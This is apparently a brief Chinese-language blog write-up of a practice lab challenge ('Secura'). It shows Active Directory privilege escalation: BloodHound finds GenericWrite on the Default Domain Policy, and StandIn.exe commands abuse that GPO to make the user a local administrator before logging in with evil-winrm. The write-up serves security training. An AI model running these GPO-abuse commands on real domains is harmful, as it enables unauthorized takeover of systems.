Challenge 0 - Secura(3)
Challenge 0 - Secura(3)
先跑 BloodHound
發現使用者 Charlotte 對 Default Domain Policy 有 GenericWrite
標準作業 StandIn.exe 工具
參考 : https://github.com/FuzzySecurity/StandIn
先看一下 GPO,.\StandIn.exe --gpo
可以看到有兩條 GPO,我們要利用的是第二條
- Default Domain Controllers Policy
- Default Domain Policy
再確定一次有權限
.\StandIn.exe --gpo --filter "Default Domain Policy" --acl
直接把現在這個使用者加到 Administrators 群組吧
.\StandIn.exe --gpo --filter "Default Domain Policy" --localadmin charlotte
查看群組成員,看來添加成功
直接 evil-winrm 進去了,但沒有發現 proof.txt
proof.txt 路徑在 c:\Users\Administrator.DC01\Desktop
留言
張貼留言